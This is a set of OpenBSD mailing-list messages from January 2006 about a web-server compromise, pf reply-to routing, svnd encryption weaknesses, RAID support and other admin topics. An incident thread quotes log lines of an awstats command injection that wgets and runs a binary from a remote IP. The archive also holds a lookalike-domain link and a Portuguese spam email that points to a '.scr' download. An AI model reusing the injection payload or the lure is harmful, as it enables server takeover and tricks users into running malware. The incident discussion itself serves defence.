On 4 Jan 2006, at 16:28, Joachim Schipper wrote: The messages in the log file indicate that they used some command injection in a script to call wget and download the files into /tmp. I'm fairly sure it was via a bad script, and I'm trying to locate which script was used, so far with no success. There was a phpBB2 in one of the paths used. If you have phpBB enabled somewhere, that's a likely attack vector. That was one of the locations that the linuxday worm was being downloaded from by the wget request. On 4 Jan 2006, at 16:35, Bryan Irvine wrote: I'd suspect it has something more to do with an easy-to-guess password. Even if the wget entries in the /var/www/logs/error_log correspond to the times and dates of the files in /tmp? bash-3.00# ls -lFa /tmp total 68 drwxrwxrwt 2 root wheel512 Jan 4 18:10 ./ drwxr-xr-x 22 root wheel512 Jun 29 2005 ../ -rw-r--r-- 1 wwwwheel 3355 Jan 2 04:14 .cpanel -rw-r--r-- 1 wwwwheel 18695 Jan 2 04:15 .cpanel.tmp -rw-r--r-- 1 wwwwheel 0 Jan 2 05:28 .plesk Some other suspect entries are these: 61.139.83.132 - - [02/Jan/2006:07:18:12 +] GET /awstats/ awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136% 2e48%2e69%2fmirela%3bchmod%2 0%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1 404 300 61.139.83.132 - - [02/Jan/2006:07:18:13 +] GET /cgi-bin/ awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136% 2e48%2e69%2fmirela%3bchmod%2 0%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1 404 300 61.139.83.132 - - [02/Jan/2006:07:18:15 +] GET /cgi-bin/awstats/ awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136% 2e48%2e69%2fmirela%3 bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1 404 308 Even though we don't have awstats installed anywhere (hence the 404). There are many 404 errors for this script. bash-3.00# locate awstats.pl bash-3.00# It's just a bit frustrating. Am I right in thinking if the wget output is in /var/www/logs/error_log then it comes from a site that has no defined ErrorLog. This is a limited number of sites, but I've found no log entries from the transfer logs for those sites that correspond with the times that wget was run. Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
Re: DadOS - sys shutdown with XDM
Feh, just have a read-only / with a read/write /home. Then just tell Dad to pull the plug when he's finished. FWIW he, and you, will probably go back to windows right quick with that solution.
Re: learning to code - suggestions needed
On Tue, 03 Jan 2006 14:35:12 -0800 Joe S [EMAIL PROTECTED] wrote: Do you have any recommendations on how I should get started? * Community college courses? * College courses? Always helpful, if you're not in full time employment. * Self-study books? Probably the best source of information. Choose UNIX environment programming books, they're the most informative. I like this one currently: http://www.amazon.co.uk/exec/obidos/ASIN/0131411543, covers lots, probably not much good to a beginner, so if it's C you're interested in, try this: http://www.amazon.co.uk/exec/obidos/ASIN/0393969452 College courses can be a bit useless unless it covers what you really want to know. Otherwise you will spend three years on a degree course to just learn to code, and that sounds like a waste of time to me. If you want to learn programming, spend 30 mins on the loo with a good book in your hands, it's worth 10 hours in the class room (added geek points if you have a wireless network and it's the pdf). -- Regards, Ed http://www.usenix.org.uk - http://irc.is-cool.net :%s/Open Source/Free Software/g
Re: How did they get here?
On 4 Jan 2006, at 16:10, knitti wrote: I would think php, but this doesn't explain it unless you turned the chroot off. Due to historical reasons, we're not running apache chrooted. This is why they're in /tmp rather than /var/www/tmp, or any other place. Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
Re: How did they get here?
From: Gaby vanhegan [mailto:[EMAIL PROTECTED] I would think php, but this doesn't explain it unless you turned the chroot off. Due to historical reasons, we're not running apache chrooted. This is why they're in /tmp rather than /var/www/tmp, or any other place. Given the security posture of a system running PHP (and PHP apps with a poor security history) in a non-chrooted environment, I'd agree that you've got a pretty acute risk avenue staring you in the face. DS
Re: How did they get here?
Gaby vanhegan wrote: On 4 Jan 2006, at 16:10, knitti wrote: I would think php, but this doesn't explain it unless you turned the chroot off. Due to historical reasons, we're not running apache chrooted. This is why they're in /tmp rather than /var/www/tmp, or any other place. historical ?
system processes
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 How I can make that non-root (or non-wheel) user's cannot view processes of other users? iD8DBQFDvDc+oN5ZK8eGpqMRAoGiAKDGZI9Zs5fy91d5mQK/k92uXcZoAQCg8ciP rIpVkKsS1nUH3MZgZeTu13Q= =BSjJ -END PGP SIGNATURE-
Re: How did they get here?
On 4 Feb 2006, at 20:38, veins wrote: I would think php, but this doesn't explain it unless you turned the chroot off. Due to historical reasons, we're not running apache chrooted. This is why they're in /tmp rather than /var/www/tmp, or any other place. historical ? There are sites on this machine that we've had since 2000, and that were running on various insecure os' from there before we made the move to OpenBSD. I suspect that it would be a medium/large sized task to make these sites work under chroot, as well as reorganise the user home folders to fit in with this. On the other hand, getting my server pwn3d (again) is even more of a ballache. Time to book in some configuration time... Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
Re: system processes
Hi Zophie can help You with that: http://www.0penbsd.com/zophie.html Best Regards At 21:59 2006-01-04, you wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 How I can make that non-root (or non-wheel) user's cannot view processes of other users? iD8DBQFDvDc+oN5ZK8eGpqMRAoGiAKDGZI9Zs5fy91d5mQK/k92uXcZoAQCg8ciP rIpVkKsS1nUH3MZgZeTu13Q= =BSjJ -END PGP SIGNATURE-
problem with packet filter
Hello I have two openbsd 3.8 boxes with packet filter, carp interfaces an pfsync like this: LAN -- || || | hme3 | - hme1 [ OpenBSD0 ] hme0 --- internet | internet | hme2 | |gw1 | gw2 | | |--- | | | | | | | hme2 | | - hme1 [ OpenBSD1 ] hme0 --- | || | hme3 | || -- I do not use round robin to load balance because the machenes on the LAN will never create a conections... only will response for internet requests I want that each box dont have a default gateway because it will be depend of the interface that the packet come from will be returned it. And work fine But I need to conect to anywhere from an specific public host and only for internet gw1 (hme0) and do not work, so I have created this rule in each box ($proxy is an macro with a public ip address and $gateway is the ip address of my gateway ): pass in quick on hme0 from $proxy to any tag PROXY keep state pass out quick reply-to ( hme0 $gateway ) keep state tagged PROXY For example if a want to connect to ssh port from $ proxy to any hme0 interface, I can not this is my tcpdump output: # tcpdump -n -e -ttt -i hme0 host 200.13.161.68 tcpdump: listening on hme0, link-type EN10MB Jan 04 11:37:41.242856 0:6:2a:96:f0:a9 0:3:ba:39:70:46 0800 62: $proxy.56791 $hme0ip.22: S 2158877508:2158877508(0) win 65535 mss 1460,nop,nop,sackOK (DF) Jan 04 11:37:41.243131 0:6:2a:96:f0:a9 0:3:ba:39:70:46 0800 62: $proxy.56791 $hme0ip.22: S 2158877508:2158877508(0) win 65535 mss 1460,nop,nop,sackOK (DF) Jan 04 11:37:41.243187 0:3:ba:39:70:46 0:6:2a:96:f0:a9 0800 62: $proxy.56791 $hme0ip.22: S 2158877508:2158877508(0) win 65535 mss 1460,nop,nop,sackOK (DF) Jan 04 11:37:41.243299 0:6:2a:96:f0:a9 0:3:ba:39:70:46 0800 62: $proxy.56791 $hme0ip.22: S 2158877508:2158877508(0) win 65535 mss 1460,nop,nop,sackOK (DF) Jan 04 11:37:41.243321 0:3:ba:39:70:46 0:6:2a:96:f0:a9 0800 62: $proxy.56791 $hme0ip.22: S 2158877508:2158877508(0) win 65535 mss 1460,nop,nop,sackOK (DF) Look... the packet come from the proxy ip address but the ip address of my hme0 interface never reply this request. The log of my packet filter show me nothing about drop or reject the response packet from hme0 ip address. Any suggestions I will apreciate so much :) Thanks in advance Mario
High Load Averages
Hello, I am running OBSD 3.8 as my monitoring / proxy server. I have been having issues with high load averages (2-2.5) on Nagios (installed chroot by packages). If I run squid (installed from ports), the load average goes up into the 6-7's. CPU is 95% free, Memory is 85-90% free, swap is unused (0K/2048M). My initial thought was that it was Nagios, but Squid (by itself) is also running high load averages. I have other OBSD servers (mail gateways and such) that are always less than 1.0 load average. When I run vmstat, there are usually between 3-7 blocked processes (although I have seen as many as 22), and they are constant (on every 5 second poll). Eventually (after a few days), the process becomes unresponsive and I have to reboot the server. my vmstat -w 5 output is: procs memorypagedisks traps cpu r b wavmfre flt re pi po fr sr wd0 wd1 int sys cs us sy id 0 4 0 88604 823596 1360 0 0 0 0 0 0 0 423 1628 44 1 1 98 0 3 0 87764 824704 3679 0 0 0 0 0 0 0 417 4113 66 2 7 91 0 4 0 88588 823588 1680 0 0 0 0 0 0 0 354 1705 46 1 2 98 0 3 0 87760 824708 3913 0 0 0 0 0 0 0 310 3561 69 1 3 95 0 3 0 87760 824712 2048 0 0 0 0 0 0 0 389 2388 44 1 6 93 0 4 0 88556 823608 3881 0 0 0 0 0 0 0 444 3547 66 3 2 95 2 3 0 89540 822048 1772 0 0 0 0 0 0 0 414 2721 41 1 8 91 0 3 0 87760 824232 3712 0 0 0 0 0 0 0 381 3459 73 4 3 93 0 3 0 87760 824712 1325 0 0 0 0 0 0 0 371 1291 39 1 1 98 0 3 0 87760 824712 4655 0 0 0 0 0 0 0 391 4463 72 2 7 90 0 3 0 87760 824716 1365 0 0 0 0 0 0 0 414 1381 43 0 2 98 0 3 0 87764 824708 4140 0 0 0 0 0 0 0 396 4502 72 5 5 91 0 3 0 87760 824716 1749 0 0 0 0 0 0 0 438 2109 48 1 3 96 0 5 0 89208 822572 4202 0 0 0 0 0 0 0 433 3952 74 1 4 95 0 3 0 87756 824720 1600 0 0 0 0 0 0 0 472 1597 57 1 2 97 0 3 0 87756 824716 4334 0 0 0 0 0 0 0 426 4491 66 2 7 90 0 3 0 87760 824708 1341 0 0 0 0 0 0 0 452 1291 37 1 2 97 0 3 0 87760 824708 3874 0 0 0 0 0 0 0 450 4270 67 3 7 90 0 3 0 87760 824712 1541 0 0 0 0 0 0 0 340 1477 40 1 1 98 0 3 0 87760 824712 3884 0 0 0 0 0 0 0 406 3496 61 2 3 95 0 4 0 88604 823588 1794 0 0 0 0 0 0 0 393 2239 54 2 5 93 0 3 0 87756 824716 3657 0 0 0 0 0 0 0 422 3410 65 1 3 95 0 3 0 87764 824708 1768 0 0 0 0 0 0 0 438 2125 50 1 3 96 0 3 0 87760 824708 4066 0 0 0 0 0 0 0 455 3654 66 3 2 94 0 4 0 88552 823608 1563 0 0 0 0 0 0 0 392 1519 40 1 1 98 0 3 0 87760 824232 4077 0 0 0 0 0 0 0 430 4207 74 4 3 93 0 3 0 87760 824708 1317 0 0 0 0 0 0 0 424 1280 39 1 1 98 0 4 0 88568 823600 4233 0 0 0 0 0 0 0 460 4659 66 3 7 90 0 3 0 87760 824712 1550 0 0 0 0 0 0 0 415 1507 45 1 1 98 0 3 0 87760 824712 4105 0 0 0 0 0 0 0 419 3688 73 3 3 95 0 4 0 88536 823636 8791 0 0 0 0 0 0 0 440 14787 229 21 13 66 0 3 0 87724 824756 2200 0 0 0 0 0 0 0 278 2221 43 1 2 97 0 3 0 87724 824752 8 0 0 0 0 0 0 0 321 103 17 0 0 100 0 3 0 87724 824756 188 0 0 0 0 0 0 0 357 258 16 0 0 100 0 3 0 87724 824752 7 0 0 0 0 0 0 0 35690 13 0 0 100 0 7 0 90592 820320 8643 0 0 0 0 0 0 0 514 9263 189 5 15 80 0 3 0 87724 824756 1586 0 0 0 0 0 0 0 301 1597 58 1 1 98 0 4 0 88508 823668 9378 0 0 0 0 0 0 0 374 8348 119 5 7 88 0 4 0 88532 823640 1940 0 0 0 0 0 0 0 343 2299 55 1 6 93 1515 0 189680 712732 19460 0 0 0 0 0 0 0 441 31721 238 33 14 54 622 0 195568 706708 37552 0 0 0 0 0 0 0 575 73375 661 71 29 0 0 6 0 106440 804032 32993 0 0 0 0 0 0 0 675 58724 663 49 29 22 0 7 0 107268 802876 3371 0 0 0 0 0 0 0 417 4513 89 3 6 91 0 7 0 107256 802408 7764 0 0 0 0 0 1 0 402 7988 131 8 9 83 0 6 0 106436 804028 1831 0 0 0 0 0 0 0 390 2514 60 2 2 96 0 5 0 89152 822584 5466 0 0 0 0 0 0 0 420 7000 89 6 5 90 0 4 0 88532 823628 1899 0 0 0 0 0 0 0 444 2725 64 1 6 93 0 3 0 87728 824700 3820 0 0 0 0 0 0 0 434 3614 85 3 2 95 0 3 0 87724 824700 1557 0 0 0 0 0 0 0 395 1481 42 1 2 98 0 4 0 88524 823600 4210 0 0 0 0 0 0 0 440 4218 67 2 7 90 0 3 0 87724 824704 1577 0 0 0 0 0 0
Patches out, no errata page update ?
So...I see there are some new patches out but no errata page update ? 150 Have a Gorilla. drwxr-xr-x2 1114 1114 512 Jan 03 13:03 . drwxr-xr-x 18 1114 1114 512 Dec 30 21:03 .. -r--r--r--1 1114 1114 7152 Jan 03 12:10 001_perl.patch -r--r--r--1 1114 1114 3953 Dec 30 20:29 002_fd.patch 226 There, everyone likes a Gorilla. ftp pwd 257 /pub/OpenBSD/patches/3.8/common -- Allie Daneman Allnix,LLC. http://www.allnix.net
Re: problem with packet filter
On 2006/01/04 15:39, Mario Beltran wrote: I want that each box dont have a default gateway because it will be depend of the interface that the packet come from will be returned it. Does adding a route to $proxy pointing to $gateway help..?
Re: CGD
warning! spoilers! openbsd svnd is not safe for general use. On 1/4/06, Ted Unangst [EMAIL PROTECTED] wrote: this is good idea. the first thing you need to do is identify your threat model. can you write it down? and if it starts with somebody stealing, you lose. amidst all the yammering, i think people are just assuming that encrypting their data makes it safe. but if you can't even say what the danger is, how can you know it's safe? my threat model includes the follwing two cases. for both of then svnd can't protect me really well case 1) lets say someone can predict some blocks in my encrypted data, then she can find every block (64bit) everywhere within the container with the same data. dependend on the nature of the data, if some blocks are known, more can be guessed. the license part of a source file is very predictable. so if some software's source, which is no secret but its possession illegal, can be proved to be on my disk without breaking my key, this is bad. some illustration to prove, that every block of the same data encrypted with the same user-key is the same in every svnd0 in the world: # dd if=/dev/zero of=/tmp/img0 bs=1k count=1 1+0 records in 1+0 records out 1024 bytes transferred in 0.000 secs (1067 bytes/sec) # dd if=/dev/zero of=/tmp/img1 bs=1k count=1 1+0 records in 1+0 records out 1024 bytes transferred in 0.000 secs (1280 bytes/sec) # vnconfig -ckv svnd0 /tmp/img0 Encryption key: test svnd0: 1024 bytes on /tmp/img0 # vnconfig -ckv svnd1 /tmp/img1 Encryption key: test svnd1: 1024 bytes on /tmp/img1 # dd if=/usr/share/misc/license.template of=/dev/rsvnd0c bs=1k count=1 1+0 records in 1+0 records out 1024 bytes transferred in 0.000 secs (12190476 bytes/sec) # dd if=/usr/share/misc/license.template of=/dev/rsvnd1c bs=1k count=1 1+0 records in 1+0 records out 1024 bytes transferred in 0.000 secs (1138 bytes/sec) # vnconfig -u svnd0 # vnconfig -u svnd1 # cmp /tmp/img0 /tmp/img1 # user key==encryption key==Bad Thing(TM) case 2) data integrity. I don't want, that a person can mess with my data without knowing my key. the location of some data can be determined on my disk, this data can be replicated everywhere else on the disk. either by insertion or by overwriting other data. illustration continued: # dd if=/tmp/img0 of=/tmp/img3 skip=1 bs=128 count=1 1+0 records in 1+0 records out 128 bytes transferred in 0.000 secs (1488372 bytes/sec) # cat /tmp/img3 /tmp/img3 /tmp/img3 /tmp/img3 /tmp/img6 # vnconfig -ckv svnd0 /tmp/img6 Encryption key: test svnd0: 512 bytes on /tmp/img6 # cat /dev/rsvnd0c dx should be separated by a comma, e.g. Copyright (c) 2003, 2004 p_h[he copyright. Additional years should be separated by a comma, e.g. Copyright (c) 2003, 2004 p_h[he copyright. Additional years should be separated by a comma, e.g. Copyright (c) 2003, 2004 p_h[he copyright. Additional years should be separated by a comma, e.g. Copyright (c) 2003, 2004 If you add extra text# classical replay attack. I seem to have screwed some block boundary, but you get the general idea. a good implementation would've produced garbage only. thanks a lot for your attention. --knitti
Re: problem with packet filter
Stuart Henderson escribis: On 2006/01/04 15:39, Mario Beltran wrote: I want that each box dont have a default gateway because it will be depend of the interface that the packet come from will be returned it. Does adding a route to $proxy pointing to $gateway help..? Thank you Stuart for you response :) Do you mean that I have to add an static route manually? I dont want this way, I want that packet filter can do this I mean that route-to and reply-to commads were create for this situations... or I am wrong? Regards Mario.
Re: pf failover state problem
On Thu, 29 Dec 2005 23:04:02 -0700 j knight [EMAIL PROTECTED] wrote: When you compare pfctl -ss on either firewall, do you see state information being replicated? Yep, I can confirm the states are being copied just fine. I hope someone is still watching this thread! -- Regards, Ed http://www.usenix.org.uk - http://irc.is-cool.net :%s/Open Source/Free Software/g
PERC 4e/si support in ami?
hi list, I'm searching for an 1 U server-platform-solution for a redundant firewall-system based on openbsd. The firewall-system should support raid 1 and at least 8 NIC's. My first choice is an Dell 1850 with embedded PERC 4e/Si controller. I belief the e means embedded. Does openbsd support the PERC 4e/Si by ami (the manpage only lists PERC 4/Si without e) ? The raid-controller has to be embedded because i need the two pci slots for quad ethernet cards. And this is my second question. Which quad ethernet card is to be recommended? I know, this question was discused many times. But i don't want to get into trouble by this interrupt-handling under heavy load with intel cards and em driver. In addition i don't need 1 Gbps ethernet cards - 100 Mbit is sufficient. The D-Link DFE-570TX seems to be the right one for this purpose but that implies to put an old pci card (32 bit, spec pci2.2) into an pci-x slot. Is this really a good idea? Any recommendations would be appreciated. joerg
Re: PERC 4e/si support in ami?
Works like a champ. I'll adjust the man. On Thu, Jan 05, 2006 at 12:41:30AM +0100, Jvrg Streckfu_ wrote: hi list, I'm searching for an 1 U server-platform-solution for a redundant firewall-system based on openbsd. The firewall-system should support raid 1 and at least 8 NIC's. My first choice is an Dell 1850 with embedded PERC 4e/Si controller. I belief the e means embedded. Does openbsd support the PERC 4e/Si by ami (the manpage only lists PERC 4/Si without e) ? The raid-controller has to be embedded because i need the two pci slots for quad ethernet cards. And this is my second question. Which quad ethernet card is to be recommended? I know, this question was discused many times. But i don't want to get into trouble by this interrupt-handling under heavy load with intel cards and em driver. In addition i don't need 1 Gbps ethernet cards - 100 Mbit is sufficient. The D-Link DFE-570TX seems to be the right one for this purpose but that implies to put an old pci card (32 bit, spec pci2.2) into an pci-x slot. Is this really a good idea? Any recommendations would be appreciated. joerg
Re: problem with packet filter
On 2006/01/04 17:00, Mario Beltran wrote: Does adding a route to $proxy pointing to $gateway help..? Thank you Stuart for you response :) Do you mean that I have to add an static route manually? Yes (I usually add static routes in /etc/hostname.hme0, etc.) I dont want this way, I want that packet filter can do this I mean that route-to and reply-to commads were create for this situations... or I am wrong? You are right, that is what route-to/reply-to are for, but when there is no routing table entry, the packet will be rejected (destination-unreachable) before it even reaches PF. Once PF has control of the packet, route-to/reply-to will be used in preference to the static route. You could point the static route to a non-existent address if one is available (it needs to be on a directly-connected subnet, otherwise attempting to add the route will give an error). Once this is done, you might need to adjust the rules. I don't think you need tagging (unless I mis-understood what you're trying to do). pfctl -sr -v is useful to let you check which rules are triggered.
Re: CGD
On Wed, Jan 04, 2006 at 11:11:01PM +0100, knitti wrote: my threat model includes the follwing two cases. for both of then svnd can't protect me really well case 1) lets say someone can predict some blocks in my encrypted data, then she can find every block (64bit) everywhere within the container with the same data. Of course not, that would have been true if it used ecb. It uses cbc which encrypts each disk block with an iv that depends on the block number, so a plaintext block will be encrypted differently depending both on which disk block it is in and what data precedes it in that block. # vnconfig -ckv svnd1 /tmp/img1 [...] # dd if=/usr/share/misc/license.template of=/dev/rsvnd0c bs=1k count=1 [...] # cmp /tmp/img0 /tmp/img1 You are comparing the entire images. Try instead to fill one image with a repeating 8-byte pattern and then check the contents. The encrypted contents will not be repeated. user key==encryption key==Bad Thing(TM) How would it help to generate a random key which is then encrypted with a user key and stored on the disk? A dictionary attack is still quite possible. While I'm here I'd like to ramble for a while about the fact that people seem to be obsessed with the ability to change their passphrases; I've seen it at least twice in this thread and sometimes I even hear people talking about changing the passphrase on pgp keys and similar. That only helps if you are sure noone has seen your previously encrypted key but now has been able to guess your passphrase and may in the future be able to access your encrypted key. See, if they already have a copy of the key encrypted with the old passphrase they will still be able to use your old passphrase on it. By reencrypting it with a new passphrase you only give them another chance to crack it. So changing the passphrase which is used to encrypt a key is stupid, you really need to generate a new key. So it will take a long time to reencrypt the disk, tough luck. The problem with user remembered passwords is that they aren't strong. The only way around that is to store a random number somewhere, e.g. a USB stick or a floppy. Therefore, you may want a combination of a stored random secret and some passphrase. You lose either = you lose your data. If someone finds the stored secret they can mount a dictionary attack or start extracting your finger nails. If you store the random secret on the disk itself it's a salt. While you can use a dictionary on it, it does mean that you have to do that for each disk you want to crack. So, salt + passphrase is good, and if you can store the salt wherever you want it's as good as you can do. case 2) data integrity. I don't want, that a person can mess with my data without knowing my key. the location of some data can be determined on my disk, this data can be replicated everywhere else on the disk. [...] classical replay attack. I seem to have screwed some block boundary, No. I don't know why you assume that ecb is used, the reason your output is messed up is cbc. It is possible to cut and paste encrypted data to some extent, but when you do that you will always mess up one crypto block. No way around that unless you find the key, so while this can be a problem it is a little less severe than you say. This is a problem with cbc, to avoid it you need to use another block chaining mode or add some integrity check. CGD also uses cbc according to http://www.imrryr.org/~elric/cgd/html4/cgd.html so unless there is some additional integrity check (which is a problem for block devices since it requires additional storage) it has the same problem. Andreas
web server project
Hi misc@ users, I have been working for a while on an ISC/OpenBSD licenced web server that will be used as an httpd replacement for our not-for-profit organization. Code is at a very early stage, but is being worked on actively and has been powering our own boxes for weeks now (for static pages only). We are looking for people interested in joining the project, wether for testing or contributing code, html, design or simply ideas. If you are interested, feel free to mail me and ask any question you might have. oh, and just to prevent trolls, goals are different from thttpd, lighttpd and definitely very very far from apache's, and so are the design and features planned. Im not advertizing the irc channel here, but here's a link to our cvsweb so you can take a look, keep in mind that it's at a _very early_ stage so lots of code is being worked on and isnt defintive: http://lab.skreel.org/cgi-bin/cvsweb/eoz/ Sorry for those that are not interested, I won't spam anymore ;-) ++ veins
Deletion of indirectly -installed packages (dependencies)
Hi, I want to know if there are any plans to support the deletion of indirectly -installed packages (dependencies). What I want I'm trying to say, is, for example, when one adds package FOO, and that package has tons of dependencies, and one then deletes it, we didn't uninstall all the dependencies. I know it isn't simple, one must first have a way to say: hey, I'm a package who was added by a user, I wasn't added just to serve a package you deleted!!, and then check if the dependency is used by any package. Also, it should always ask if we want to delete that dependecy, maybe someone starts using it directly instead of using the package which needed it to be added. But, IMHO, it would be nice, =). Help you understand me, good luck
Re: CGD
Andreas Gunnarsson wrote: On Wed, Jan 04, 2006 at 11:11:01PM +0100, knitti wrote: my threat model includes the follwing two cases. for both of then svnd can't protect me really well case 1) lets say someone can predict some blocks in my encrypted data, then she can find every block (64bit) everywhere within the container with the same data. Of course not, that would have been true if it used ecb. It uses cbc which encrypts each disk block with an iv that depends on the block number, so a plaintext block will be encrypted differently depending both on which disk block it is in and what data precedes it in that block. Yeah, and had it been using ECB, still two plaintext would have to be aligned to the beginning of a block and fill the 64 bits for the ciphered block to look the same.
Re: What does this error message mean?
I found a very strang line in my /etc/hosts file. The line says ::1 localhost.cimsolve.com localhost This line is followed by a normal line 127.0.0.1 localhost.cimsolve.com localhost How did the first line get there, because I didn't put it there. Jim
Re: What does this error message mean?
On Wed, Jan 04, 2006 at 08:44:19PM -0600, Jim Mays wrote: I found a very strang line in my /etc/hosts file. The line says ::1 localhost.cimsolve.com localhost This line is followed by a normal line 127.0.0.1 localhost.cimsolve.com localhost How did the first line get there, because I didn't put it there. does it look like it is from: /usr/src/distrib/miniroot/install.sh: 330 # Always create new hosts file. 331 cat /tmp/hosts __EOT 332 ::1 localhost 333 127.0.0.1 localhost 334 ::1 $(hostname -s) 335 127.0.0.1 $(hostname -s) 336 __EOT -- jared [ openbsd 3.8 GENERIC ( dec 16 ) // i386 ]
Re: What does this error message mean?
On Mon, Jan 02, 2006 at 08:17:43PM -0600, Jim Mays wrote: resolv.conf file: search hsd1.tx.comcast.net. nameserver 68.87.85.98 nameserver 68.87.69.146 looklup file bind if that is a paste-o and not a type-o, that might be attributable to a little bit of suckage. ( looklup != lookup ) -- jared [ openbsd 3.8 GENERIC ( dec 16 ) // i386 ]
Voce recebeu uma charge humortadela
Ola! Alguim que nco tinha nada para fazer, numa de suas visitas ao Humor Tadela nco sei por que cargas d'agua, lhe recomendou a seguinte pagina: Piada Animada: Felizes Para Sempre? Nco funcionou? Nco se desespere! Pegue o seu browser digite o seguinte enderego: http://humortadela.com.br/charges.scr Ou Acesse CLICANDO AQUI!!! Ainda nco funcionou? Bem, entco chegou a hora de comegar a se desesperar... Turma do Humor Tadela [IMAGE] O maior site de humor da Amirica Latina! http://humortadela.com.br Em 03/01/2005, horario de Brasmlia amarela, 75 e em bom estado.